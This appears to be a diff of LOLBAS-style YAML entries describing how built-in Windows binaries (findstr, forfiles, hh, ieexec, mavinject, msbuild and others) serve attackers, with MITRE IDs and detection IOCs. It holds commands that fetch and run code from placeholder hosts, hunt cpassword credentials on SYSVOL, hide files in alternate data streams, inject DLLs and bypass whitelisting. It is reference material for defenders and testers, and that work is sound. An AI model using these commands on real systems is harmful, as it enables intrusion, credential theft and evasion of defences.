|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|     Usecase: Add a file to an alternate data stream to hide from defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.txt:file.exe | ||||
|     Description: 'Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.' | ||||
|   - Command: findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml | ||||
|     Description: 'Search for stored password in Group Policy files stored on SYSVOL.' | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file. | ||||
|     Usecase: Add a file to an alternate data stream from a webdav server to hide from defensive counter measures | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /S /I cpassword \\sysvol\policies\*.xml | ||||
|     Description: Search for stored password in Group Policy files stored on SYSVOL. | ||||
|     Usecase: Find credentials stored in cpassword attrbute | ||||
|     Category: Credentials | ||||
|     Privileges: User | ||||
|     MitreID: T1081 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1081 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: findstr /V /L W3AllLov3DonaldTrump \\webdavserver\folder\file.exe > c:\ADS\file.exe | ||||
|     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is downloaded to the target file. | ||||
|     Usecase: Download/Copy file from webdav server | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1185 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1185 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\findstr.exe | ||||
|   - c:\windows\sysWOW64\findstr.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\findstr.exe | ||||
|   - Path: C:\Windows\SysWOW64\findstr.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: finstr.exe should normally not be invoked on a client system | ||||
| Resources: | ||||
|   - https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,22 +1,39 @@ | ||||
| --- | ||||
| Name: Forfiles.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Selects and executes a command on a file or set of files. This command is useful for batch processing. | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe | ||||
|     Description: 'Executes calc.exe since there is a match for notepad.exe in the c:\\windows\\System32 folder.' | ||||
|     Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder. | ||||
|     Usecase: Use forfiles to start a new process to evade defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | ||||
|     Description: 'Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\\windows\\system32 folder.' | ||||
|     Description: Executes the evil.exe Alternate Data Stream (AD) since there is a match for notepad.exe in the c:\windows\system32 folder. | ||||
|     Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\system32\forfiles.exe | ||||
|   - C:\Windows\sysWOW64\forfiles.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\forfiles.exe | ||||
|   - Path: C:\Windows\SysWOW64\forfiles.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://twitter.com/vector_sec/status/896049052642533376 | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Eric - @vector_sec, Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://twitter.com/vector_sec/status/896049052642533376 | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Eric | ||||
|     Handle: '@vector_sec' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,22 +1,36 @@ | ||||
| --- | ||||
| Name: Gpscript.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: Used by group policy to process scripts  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: Gpscript /logon | ||||
|     Description: 'Executes logon scripts configured in Group Policy.' | ||||
|     Description: Executes logon scripts configured in Group Policy. | ||||
|     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: Gpscript /startup | ||||
|     Description: 'Executes startup scripts configured in Group Policy.' | ||||
|     Description: Executes startup scripts configured in Group Policy | ||||
|     Usecase: Add local group policy logon script to execute file and hide from defensive counter measures | ||||
|     Category: Execute | ||||
|     Privileges: Administrator | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\gpscript.exe | ||||
|   - c:\windows\sysWOW64\gpscript.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\gpscript.exe | ||||
|   - Path: C:\Windows\SysWOW64\gpscript.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Scripts added in local group policy | ||||
|  - IOC: Execution of Gpscript.exe after logon | ||||
| Resources: | ||||
|   - https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ | ||||
| Notes: | | ||||
|     Thanks to Oddvar Moe - @oddvarmoe | ||||
|     Requires administrative rights and modifications to local group policy settings. | ||||
|  | ||||
|   - Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,23 +1,35 @@ | ||||
| --- | ||||
| Name: hh.exe | ||||
| Description: Download, Execute | ||||
| Author: '' | ||||
| Name: Hh.exe | ||||
| Description: Binary used for processing chm files in Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: HH.exe http://www.google.com | ||||
|     Description: Opens google's web page with HTML Help. | ||||
|   - Command: HH.exe C:\ | ||||
|     Description: Opens c:\\ with HTML Help. | ||||
|   - Command: HH.exe c:\windows\system32\calc.exe | ||||
|     Description: 'Opens calc.exe with HTML Help.' | ||||
|   - Command: HH.exe http://some.url/script.ps1 | ||||
|     Description: Open the target PowerShell script with HTML Help. | ||||
|     Usecase: Download files from url | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: HH.exe c:\windows\system32\calc.exe | ||||
|     Description: Executes calc.exe with HTML Help. | ||||
|     Usecase: Execute process with HH.exe | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1216 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1216 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\hh.exe | ||||
|   - c:\windows\sysWOW64\hh.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\hh.exe | ||||
|   - Path: C:\Windows\SysWOW64\hh.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: hh.exe should normally not be in use on a normal workstation | ||||
| Resources: | ||||
|   - https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|   - Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/ | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,20 +1,29 @@ | ||||
| --- | ||||
| Name: Ie4unit.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description:  | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: ie4unit.exe -BaseSettings | ||||
|     Description: 'Executes commands from a specially prepared ie4uinit.inf file.' | ||||
|     Description: Executes commands from a specially prepared ie4uinit.inf file. | ||||
|     Usecase: Get code execution by copy files to another location | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - 'c:\windows\system32\ie4unit.exe    ' | ||||
|   - 'c:\windows\sysWOW64\ie4unit.exe    ' | ||||
|   - 'c:\windows\system32\ieuinit.inf    ' | ||||
|   - 'c:\windows\sysWOW64\ieuinit.inf    ' | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: c:\windows\system32\ie4unit.exe | ||||
|   - Path: c:\windows\sysWOW64\ie4unit.exe | ||||
|   - Path: c:\windows\system32\ieuinit.inf | ||||
|   - Path: c:\windows\sysWOW64\ieuinit.inf | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: ie4unit.exe loading a inf file from outside %windir% | ||||
| Resources: | ||||
|   - https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ | ||||
| Notes: Thanks to Jimmy - @bohops | ||||
|  | ||||
|   - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ | ||||
| Acknowledgement: | ||||
|   - Person: Jimmy | ||||
|     Handle: '@bohops' | ||||
| --- | ||||
| @@ -1,18 +1,35 @@ | ||||
| --- | ||||
| Name: IEExec.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Ieexec.exe | ||||
| Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe | ||||
|     Description: 'Executes bypass.exe from the remote server.' | ||||
|   - Command:ieexec.exe http://x.x.x.x:8080/bypass.exe  | ||||
|     Description: Downloads and executes bypass.exe from the remote server. | ||||
|     Usecase: Download and run attacker code from remote location | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command:ieexec.exe http://x.x.x.x:8080/bypass.exe  | ||||
|     Description: Downloads and executes bypass.exe from the remote server. | ||||
|     Usecase: Download and run attacker code from remote location | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\ieexec.exe | ||||
|   - c:\windows\sysWOW64\ieexec.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC:  | ||||
| Resources: | ||||
|   - https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,20 +1,28 @@ | ||||
| --- | ||||
| Name: InfDefaultInstall.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Infdefaultinstall.exe | ||||
| Description: Binary used to perform installation based on content inside inf files | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: InfDefaultInstall.exe Infdefaultinstall.inf | ||||
|     Description: 'Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.' | ||||
|     Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. | ||||
|     Usecase: Code execution | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\Infdefaultinstall.exe | ||||
|   - c:\windows\sysWOW64\Infdefaultinstall.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\Infdefaultinstall.exe | ||||
|   - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe | ||||
| Code Sample:  | ||||
| - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   - https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a | ||||
|   - https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ | ||||
| Notes: Thanks to Kyle Hanslovan - @kylehanslovan | ||||
|  | ||||
|   - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 | ||||
|   - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ | ||||
| Acknowledgement: | ||||
|   - Person: Kyle Hanslovan | ||||
|     Handle: '@kylehanslovan' | ||||
| --- | ||||
| @@ -1,25 +1,42 @@ | ||||
| --- | ||||
| Name: InstallUtil.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Installutil.exe | ||||
| Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
|     Description: 'Execute the target .NET DLL or EXE.' | ||||
|     Description: Execute the target .NET DLL or EXE. | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1118 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1118 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | ||||
|     Description: Execute the target .NET DLL or EXE. | ||||
|     Usecase: Use to execute code and bypass application whitelisting | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1118 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1118 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: | ||||
| Resources: | ||||
|   - https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   - https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
|   - http://subt0x10.blogspot.no/2017/09/banned-file-execution-via.html | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/InstallUtil.md | ||||
|   - https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Notes: Thanks to Casey Smith - @subtee | ||||
|  | ||||
|   - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/ | ||||
|   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12 | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1118/T1118.md | ||||
|   - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
|   - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
| --- | ||||
| @@ -1,22 +1,44 @@ | ||||
| --- | ||||
| Name: Makecab.exe | ||||
| Description: Package, Add ADS, Download | ||||
| Author: '' | ||||
| Description: Binary to package existing files into a cabinet (.cab) file | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab | ||||
|     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab | ||||
|     Description: Compresses the target file and stores it in the target file. | ||||
|     Usecase: Hide data compressed into an alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.txt:file.cab | ||||
|     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file. | ||||
|     Usecase: Hide data compressed into an alternate data stream | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: makecab \\webdavserver\webdav\file.exe C:\Folder\file.cab | ||||
|     Description: Download and compresses the target file and stores it in the target file. | ||||
|     Usecase: Download file and compress into a cab file | ||||
|     Category: Download | ||||
|     Privileges: User | ||||
|     MitreID: T1105 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1105 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - c:\windows\system32\makecab.exe | ||||
|   - c:\windows\sysWOW64\makecab.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\makecab.exe | ||||
|   - Path: C:\Windows\SysWOW64\makecab.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Makecab getting files from Internet | ||||
|  - IOC: Makecab storing data into alternate data streams | ||||
| Resources: | ||||
|   - https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Notes: Thanks to Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||||
| Acknowledgement: | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,22 +1,39 @@ | ||||
| --- | ||||
| Name: Mavinject.exe | ||||
| Description: Execute, Read ADS | ||||
| Author: '' | ||||
| Description: Used by App-v in Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll | ||||
|     Description: Inject evil.dll into a process with PID 3110. | ||||
|     Usecase: Inject dll file into running process | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1218 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1218 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: Mavinject.exe 4172 /INJECTRUNNING "c:\ads\file.txt:file.dll" | ||||
|     Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172. | ||||
|     Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172 | ||||
|     Usecase: Inject dll file into running process | ||||
|     Category: Alternate data streams | ||||
|     Privileges: User | ||||
|     MitreID: T1096 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1096 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\System32\mavinject.exe | ||||
|   - C:\Windows\SysWOW64\mavinject.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\System32\mavinject.exe | ||||
|   - Path: C:\Windows\SysWOW64\mavinject.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: mavinject.exe should not run unless APP-v is in use on the workstation | ||||
| Resources: | ||||
|   - https://twitter.com/gN3mes1s/status/941315826107510784 | ||||
|   - https://twitter.com/Hexcorn/status/776122138063409152 | ||||
|   - https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s, Adam - @hexacorn, Oddvar Moe - @oddvarmoe | ||||
|  | ||||
|   - Link: https://twitter.com/gN3mes1s/status/941315826107510784 | ||||
|   - Link: https://twitter.com/Hexcorn/status/776122138063409152 | ||||
|   - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ | ||||
| Acknowledgement: | ||||
|   - Person: Giuseppe N3mes1s | ||||
|     Handle: '@gN3mes1s' | ||||
|   - Person: Oddvar Moe | ||||
|     Handle: '@oddvarmoe' | ||||
| --- | ||||
| @@ -1,27 +1,44 @@ | ||||
| --- | ||||
| Name: Msbuild.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Name: Msbuild.exe  | ||||
| Description: Used to compile and execute code | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
| Categories: [] | ||||
| Commands: | ||||
|   - Command: msbuild.exe pshell.xml | ||||
|     Description: Build and execute a C# project stored in the target XML file. | ||||
|   - Command: msbuild.exe Msbuild.csproj | ||||
|     Description: Build and execute a C# project stored in the target CSPROJ file. | ||||
|     Usecase: Compile and run code | ||||
|     Category: AWL bypass | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
|   - Command: msbuild.exe project.csproj | ||||
|     Description: Build and execute a C# project stored in the target csproj file. | ||||
|     Usecase: Compile and run code | ||||
|     Category: Execute | ||||
|     Privileges: User | ||||
|     MitreID: T1127 | ||||
|     MitreLink: https://attack.mitre.org/wiki/Technique/T1127 | ||||
|     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||||
| Full Path: | ||||
|   - C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | ||||
|   - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe | ||||
| Code Sample: [] | ||||
| Detection: [] | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe | ||||
|   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe | ||||
| Code Sample:  | ||||
| - Code: | ||||
| Detection: | ||||
|  - IOC: Msbuild.exe should not normally be executed on workstations | ||||
| Resources: | ||||
|   - https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Execution/Trusted_Developer_Utilities.md | ||||
|   - https://github.com/Cn33liz/MSBuildShell | ||||
|   - https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ | ||||
|   - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Notes: Thanks to Casey Smith - @subtee, Cn33liz - @Cneelis | ||||
|  | ||||
|   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md | ||||
|   - Link: https://github.com/Cn33liz/MSBuildShell | ||||
|   - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ | ||||
|   - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ | ||||
| Acknowledgement: | ||||
|   - Person: Casey Smith | ||||
|     Handle: '@subtee' | ||||
|   - Person: Cn33liz | ||||
|     Handle: '@Cneelis' | ||||
| --- | ||||
| @@ -1,19 +1,27 @@ | ||||
| --- | ||||
| Name: Msconfig.exe | ||||
| Description: Execute | ||||
| Author: '' | ||||
| Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows | ||||
| Author: 'Oddvar Moe' | ||||
| Created: '2018-05-25' | ||||
